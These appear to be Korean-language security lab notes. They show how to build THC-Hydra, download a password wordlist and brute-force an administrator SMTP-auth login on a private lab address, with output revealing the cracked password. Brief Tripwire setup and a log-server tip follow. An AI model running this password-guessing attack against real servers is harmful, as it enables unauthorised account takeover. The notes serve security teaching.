Hydra 를 이용하여 Administrator 비밀번호 알아내기
http://packetstorm.linuxsecurity.com/ 에서 Search 에 hydra 입력
hydra 다운로드
tar xvfz hydra-5.4-src.tar.gz
http://packetstorm.linuxsecurity.com/Crackers/wordlists/에서 passlist 다운로드
# cd hydra-5.4-src
# ./configure && make && make install
# ./hydra -l administrator -P /root/passlist 192.168.234.129 smtp-auth
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2007-12-18 16:20:17
[DATA] 16 tasks, 1 servers, 5248 login tries (l:1/p:5248), ~328 tries per task
[DATA] attacking service smtp-auth on port 25
[25][smtpauth] host: 192.168.234.129 login: administrator password: 12345
[STATUS] attack finished for 192.168.234.129 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2007-12-18 16:20:21
http://www.adventnet.com --> 공짜 로그서버 제공 (5개 서버까지 등록 가능) --> EventLog Analyzer 4
tripwire 설치
- # yum -y install tripwire
-
# tripwire-setup-keyfiles
# tripwire --init
# tripwire --check
==============================
http://www.irongeek.com
http://www.irongeek.com/i.php?page=videos/remote-password-auditing-using-thc-hydra
http://www.pauldotcom.com/2007/03/01/password_cracking_with_thchydr.html
http://www.darknet.org.uk/2007/02/thc-hydra-the-fast-and-flexible-network-login-hacking-tool/